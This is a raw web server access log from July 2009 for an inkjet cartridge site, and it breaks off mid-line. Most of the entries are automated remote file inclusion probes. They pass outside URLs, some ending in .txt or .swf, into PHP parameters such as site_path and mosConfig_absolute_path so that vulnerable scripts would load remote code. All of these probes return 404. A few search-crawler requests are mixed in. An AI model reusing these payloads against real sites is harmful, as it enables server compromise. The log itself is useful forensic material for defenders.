209.51.133.202 - - [02/Jul/2009:18:10:44 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
209.51.133.202 - - [02/Jul/2009:18:10:44 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
209.51.133.202 - - [02/Jul/2009:18:10:44 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
209.51.133.202 - - [02/Jul/2009:18:13:49 -0700] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
204.62.55.11 - - [02/Jul/2009:18:14:06 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "site.inkjetcartridge.com"
204.62.55.11 - - [02/Jul/2009:18:14:16 -0700] "GET /email?D=D HTTP/1.1" 301 105 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "site.inkjetcartridge.com"
204.62.55.11 - - [02/Jul/2009:18:14:20 -0700] "GET /email/?D=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "site.inkjetcartridge.com"
72.30.142.161 - - [02/Jul/2009:18:43:06 -0700] "GET /phpbb/viewtopic.php?p=2169 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:48 -0700] "GET /include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:48 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:48 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:49 -0700] "GET /include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:50 -0700] "GET /logs/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:50 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:54 -0700] "GET /include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:54 -0700] "GET /logs/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:54 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:57 -0700] "GET /include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:57 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:57 -0700] "GET /logs/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:43:59 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:44:01 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:44:09 -0700] "GET /include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:44:09 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:44:09 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:44:15 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:44:43 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:44:58 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:45:46 -0700] "GET /include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:45:46 -0700] "GET /logs/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:45:46 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:45:52 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:51:07 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:51:47 -0700] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:52:05 -0700] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:58:17 -0700] "GET /include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:58:17 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:58:17 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:58:35 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:58:53 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:58:53 -0700] "GET /logs/include/lib.inc.php?site_path=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:58:53 -0700] "GET /include/lib.inc.php?site_path=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:58:53 -0700] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:59:01 -0700] "GET /include/lib.inc.php?site_path=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:59:01 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:59:01 -0700] "GET /logs/include/lib.inc.php?site_path=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:18:59:02 -0700] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:59:30 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:59:30 -0700] "GET /include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:59:30 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:59:31 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:59:31 -0700] "GET /include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:59:31 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:59:31 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:18:59:32 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:19:00:08 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:19:00:09 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.161 - - [02/Jul/2009:19:00:26 -0700] "GET /phpbb/viewtopic.php?p=3338 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
217.125.38.117 - - [02/Jul/2009:19:03:17 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
217.125.38.117 - - [02/Jul/2009:19:03:17 -0700] "GET /include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
217.125.38.117 - - [02/Jul/2009:19:03:17 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
208.96.54.70 - - [02/Jul/2009:19:03:33 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.70 - - [02/Jul/2009:19:03:50 -0700] "GET /phpbb//posting.php?f=1&mode=newtopic HTTP/1.1" 200 534 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:19:05:09 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:19:05:14 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:19:05:57 -0700] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:19:05:59 -0700] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:19:06:40 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:19:06:40 -0700] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:19:06:40 -0700] "GET /logs/access.log/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
208.96.54.70 - - [02/Jul/2009:19:07:41 -0700] "GET /phpbb/viewtopic.php?p=1698 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:19:09:43 -0700] "GET /logs/access.log/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:19:09:44 -0700] "GET /logs/access.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
208.96.54.70 - - [02/Jul/2009:19:15:47 -0700] "GET /phpbb/viewtopic.php?p=5144 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.70 - - [02/Jul/2009:19:15:57 -0700] "GET /phpbb/viewtopic.php?p=1679 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
217.125.38.117 - - [02/Jul/2009:19:15:58 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
208.96.54.70 - - [02/Jul/2009:19:16:23 -0700] "GET /phpbb/viewtopic.php?p=2359 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.70 - - [02/Jul/2009:19:16:59 -0700] "GET /phpbb/viewtopic.php?p=5157 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
217.125.38.117 - - [02/Jul/2009:19:17:11 -0700] "GET /logs/scripts.log/include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
208.96.54.70 - - [02/Jul/2009:19:17:29 -0700] "GET /phpbb/viewtopic.php?p=5161 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
208.96.54.70 - - [02/Jul/2009:19:17:59 -0700] "GET /phpbb/viewtopic.php?p=8847 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "site.inkjetcartridge.com"
59.125.5.1 - - [02/Jul/2009:19:18:04 -0700] "GET /logs/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
59.125.5.1 - - [02/Jul/2009:19:18:04 -0700] "GET /logs/access.log%20%20/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
59.125.5.1 - - [02/Jul/2009:19:18:04 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
59.125.5.1 - - [02/Jul/2009:19:22:11 -0700] "GET /logs/access.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.161 - - [02/Jul/2009:19:24:45 -0700] "GET /phpbb/viewtopic.php?t=437 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
123.143.98.5 - - [02/Jul/2009:19:31:30 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [02/Jul/2009:19:31:30 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.98.5 - - [02/Jul/2009:19:31:30 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:19:43:40 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:19:43:40 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [02/Jul/2009:19:43:40 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.220.199.70 - - [02/Jul/2009:19:44:32 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "site.inkjetcartridge.com"
67.220.199.70 - - [02/Jul/2009:19:44:32 -0700] "GET /include/lib.inc.php?site_path=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "site.inkjetcartridge.com"
67.220.199.70 - - [02/Jul/2009:19:44:32 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "site.inkjetcartridge.com"
67.220.199.70 - - [02/Jul/2009:19:44:32 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "site.inkjetcartridge.com"
67.220.199.70 - - [02/Jul/2009:19:44:32 -0700] "GET /include/lib.inc.php?site_path=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "site.inkjetcartridge.com"
67.220.199.70 - - [02/Jul/2009:19:44:33 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.musclecarsandtrucks.com//poll/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "site.inkjetcartridge.com"
87.118.106.133 - - [02/Jul/2009:19:52:34 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://r0x.beepworld.it/files/file/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.161 - - [02/Jul/2009:19:53:24 -0700] "GET /phpbb/viewtopic.php?t=2412 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
87.118.106.133 - - [02/Jul/2009:19:54:42 -0700] "GET /include/lib.inc.php?site_path=http://r0x.beepworld.it/files/file/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.118.106.133 - - [02/Jul/2009:19:54:42 -0700] "GET /logs/include/lib.inc.php?site_path=http://r0x.beepworld.it/files/file/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.118.106.133 - - [02/Jul/2009:19:54:42 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://r0x.beepworld.it/files/file/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.118.106.133 - - [02/Jul/2009:19:55:39 -0700] "GET /logs/scripts.log%20%20/include/lib.inc.php?site_path=http://r0x.beepworld.it/files/file/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.232.143.55 - - [02/Jul/2009:20:00:43 -0700] "GET /include/bbs.lib.inc.php?site_path=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
72.30.142.161 - - [02/Jul/2009:20:01:15 -0700] "GET /phpbb/viewtopic.php?t=246&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:20:05:05 -0700] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:20:05:06 -0700] "GET /logs/access.log/components/com_securityimages/lang.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:20:05:06 -0700] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:20:05:11 -0700] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:20:05:11 -0700] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:20:05:11 -0700] "GET /logs/access.log/components/com_securityimages/lang.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:20:07:37 -0700] "GET /logs/access.log%20%20/components/com_securityimages/lang.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [02/Jul/2009:20:07:38 -0700] "GET /logs/scripts.log%20%20/components/com_securityimages/lang.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
59.125.5.1 - - [02/Jul/2009:20:10:53 -0700] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
59.125.5.1 - - [02/Jul/2009:20:10:53 -0700] "GET /logs/access.log/components/com_se